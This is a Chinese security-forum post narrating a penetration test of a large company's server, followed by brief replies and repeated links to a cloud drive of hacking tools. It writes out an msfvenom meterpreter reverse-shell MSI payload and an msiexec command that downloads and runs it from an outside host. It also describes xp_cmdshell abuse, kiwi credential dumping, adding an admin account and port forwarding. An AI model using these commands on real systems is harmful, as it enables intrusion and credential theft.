用户
搜索

该用户从未签到

i春秋-见习白帽

公众号:掌控安全EDU

Rank: 3Rank: 3

22

主题

47

帖子

377

魔法币
收听
0
粉丝
1
注册时间
2018-8-14
ZKAQ i春秋-见习白帽 公众号:掌控安全EDU 楼主
发表于 2020-11-16 15:18:39 64794

---掌控安全社区-核心成员urfyyyy投稿前言
我从来没想到一个sa权限的sqlserver居然有这么多坑。

直接写一个成功的全流程步骤吧,踩坑太多写不过来。

没写到的姿势不代表没有,但大部分姿势确实没有。

这是一次某巨型企业的渗透项目,文中重码警告

web打点
经过一周的信息收集,找来又找去,发现了一个疑似系统配置的web系统,且存在弱口令(为什么每个企业都有弱口令呢….)

admin / 123456 直接起飞!



各个功能翻找一波,没有getshell的位置,就很nice,并且虽然有配置文件,但所有密码都是长度一样的*
拿到权限
我啪的一下发现了一个日志功能,很快啊,又发现了连接数据库的json,有部分数据库密码是明文的,测试了一波,找到了几个允许外连的,挑其中一个下手(主要是这台密码短输着爽)

因为是sqlserver的sa权限,所以开启xp_cmdshell直接一锤打爆他的服务器。



这时,领导看着我说,这不是必日穿,我说那肯定。没想到后续还是挣扎了大半天。。。。
反弹shell
对方当前库对应的web系统没有open,所以无法写webshell访问,这里选择用msi的形式反弹
msfVENOM -p windows/meterpreter/reverse_tcp lhost=192.168.1.103 lport=7777 -f msi > test.msi
接着xp_cmdshell执行命令,获得session
msiexec.exe /q /i https://tongjingi.cn/test.msi

内网?!
查看机器的进程,继续信息搜集,无杀软,无需免杀


加载kiwi获取管理员明文口令


试了挺多种方式,抓不到也解不出,不试了,既然是system,那就加个管理员吧
常规套路,3389一开,mstsc一连,岂不是美滋滋,进去深入内网,扬名立万



3389不通,需要将其转发出来,msf使用portfwd进行转发


emm…通到是通了,但出现了一个奇怪的报错,解决方法是改自己本机的注册表。



解决方式如下图

终于连上了


你们猜怎么着?内网无存活主机,溜了溜了,后续和客户确认,这台服务器是他们公司内部的一台孤儿机器。
希望各位管理员耗子尾汁,杜绝弱口令,不要耍这样的聪明,小聪明啊。

众多黑客渗透视频教程及工具,都放在百度网盘里了,可自取
链接:https://pan.baidu.com/s/1pSoknsvtp81xJIeUHHc2Dw
提取码:9ev2


发表于 2020-11-16 16:30:34
学习了
使用道具 举报 回复
ZKAQ i春秋-见习白帽 公众号:掌控安全EDU
板凳
发表于 2020-11-16 16:43:26
众多黑客渗透视频教程及工具,都放在百度网盘里了,可自取
链接:https://pan.baidu.com/s/1pSoknsvtp81xJIeUHHc2Dw
提取码:9ev2
使用道具 举报 回复
表哥,网盘被吞了
使用道具 举报 回复
发表于 2020-11-19 09:18:43
看到渗透两个字我就点进来了,啪的一下,很快啊
使用道具 举报 回复
ZKAQ i春秋-见习白帽 公众号:掌控安全EDU
5#
发表于 2020-11-19 11:30:38

众多黑客渗透视频教程及工具,都放在百度网盘里了,可自取
链接:https://pan.baidu.com/s/1pSoknsvtp81xJIeUHHc2Dw
提取码:9ev2
使用道具 举报 回复
ZKAQ i春秋-见习白帽 公众号:掌控安全EDU
6#
发表于 2020-11-19 11:31:29

私发你了,你看下能不能看
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册